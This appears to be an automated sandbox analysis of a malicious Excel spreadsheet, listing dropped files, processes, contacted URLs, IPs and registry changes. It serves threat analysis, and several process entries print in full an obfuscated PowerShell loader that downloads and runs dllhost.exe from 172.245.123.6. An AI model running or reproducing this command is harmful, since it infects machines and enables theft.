Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SYSN ORDER.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 02:41:41 2024, Security: 1
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbokkworkingforupdate[1].hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\dllhost.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\Desktop\SYSN ORDER.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:12:36 2024, Security: 1
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15C11140.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF73AEE2.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2ufkmc2n.u5y.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES4348.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:12:29 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES866F.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:12:46 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\differences
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ibz3bu0a.pqq.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\qdk1rybx.30f.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\xe1pvlqt.go1.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DF07397FB908C5B4FE.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DF2C958FD442F9D1AC.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DFA455A9BB9C6A2709.TMP
|
data
|
dropped
|
||
C:\Users\user\Desktop\B8230000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:12:36 2024, Security: 1
|
dropped
|
||
C:\Users\user\Desktop\B8230000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 21 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs
-NoP -w 1 -c
DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
POwerSHELL -eX BypASs -NoP
-w 1 -c DevicecREdENtIalDepLoYMent.Exe
; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
|
||
C:\Users\user\AppData\Roaming\dllhost.exe
|
"C:\Users\user\AppData\Roaming\dllhost.exe"
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Users\user\AppData\Roaming\dllhost.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs
-NoP -w 1 -c
DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
POwerSHELL -eX BypASs -NoP
-w 1 -c DevicecREdENtIalDepLoYMent.Exe
; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
|
||
C:\Users\user\AppData\Roaming\dllhost.exe
|
"C:\Users\user\AppData\Roaming\dllhost.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Users\user\AppData\Roaming\dllhost.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp"
"c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp"
"c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
|
There are 5 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
|
172.245.123.6
|
||
http://172.245.123.6/770/dllhost.exe
|
172.245.123.6
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaA
|
unknown
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...EEBDD-A8
|
unknown
|
||
https://og1.in/cIP5a8
|
172.67.216.244
|
||
https://og1.in/
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
https://og1.in/cIP5a8O
|
unknown
|
||
https://og1.in/cIP5a8H
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://og1.in/cIP5a8K
|
unknown
|
||
http://172.245.123.6/C
|
unknown
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta0
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
https://reallyfreegeoip.org/xml/8.46.123.334
|
unknown
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta7
|
unknown
|
||
http://go.micros
|
unknown
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta4
|
unknown
|
||
https://og1.in/=#
|
unknown
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaet
|
unknown
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htahttp://172.245.123.6/xampp/crio/IEnetbo
|
unknown
|
||
http://checkip.dyndns.org/
|
193.122.130.0
|
||
http://172.245.123.6/
|
unknown
|
||
https://og1.in/cIP5a8m
|
unknown
|
||
http://checkip.dyndns.org/q
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://reallyfreegeoip.org
|
unknown
|
||
https://og1.in/cIP5a8&W
|
unknown
|
||
http://checkip.dyndns.com
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://reallyfreegeoip.orgPLZ
|
unknown
|
||
https://reallyfreegeoip.org/xml/
|
unknown
|
||
https://og1.in/cIP5a8pdate.hta
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaC:
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://og1.in/cIP5a8$
|
unknown
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...
|
unknown
|
||
http://checkip.dyndns.org
|
unknown
|
||
https://reallyfreegeoip.org/xml/8.46.123.33
|
188.114.96.3
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htas
|
unknown
|
||
http://crl.m
|
unknown
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
http://172.245.123.6/O
|
unknown
|
||
https://reallyfreegeoip.org/xml/8.46.123.33PLZ
|
unknown
|
||
http://172.245.123.6/770/dllhost.exes
|
unknown
|
||
http://172.245.123.6/770/dllhost.exep
|
unknown
|
||
http://172.245.123.6/770/dllhost.exes?e
|
unknown
|
||
https://reallyfreegeoip.org
|
unknown
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta8A
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaW
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
http://172.245.123.6/770/dllhost
|
unknown
|
There are 48 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
reallyfreegeoip.org
|
188.114.96.3
|
||
checkip.dyndns.org
|
unknown
|
||
og1.in
|
172.67.216.244
|
||
checkip.dyndns.com
|
193.122.130.0
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.245.123.6
|
unknown
|
United States
|
||
188.114.96.3
|
reallyfreegeoip.org
|
European Union
|
||
132.226.8.169
|
unknown
|
United States
|
||
104.21.78.54
|
unknown
|
United States
|
||
188.114.97.3
|
unknown
|
European Union
|
||
193.122.6.168
|
unknown
|
United States
|
||
193.122.130.0
|
checkip.dyndns.com
|
United States
|
||
158.101.44.242
|
unknown
|
United States
|
||
172.67.216.244
|
og1.in
|
United States
|
||
132.226.247.73
|
unknown
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
&>/
|
||
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28E89
|
28E89
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
{$/
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32F2B
|
32F2B
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\331BA
|
331BA
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33997
|
33997
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
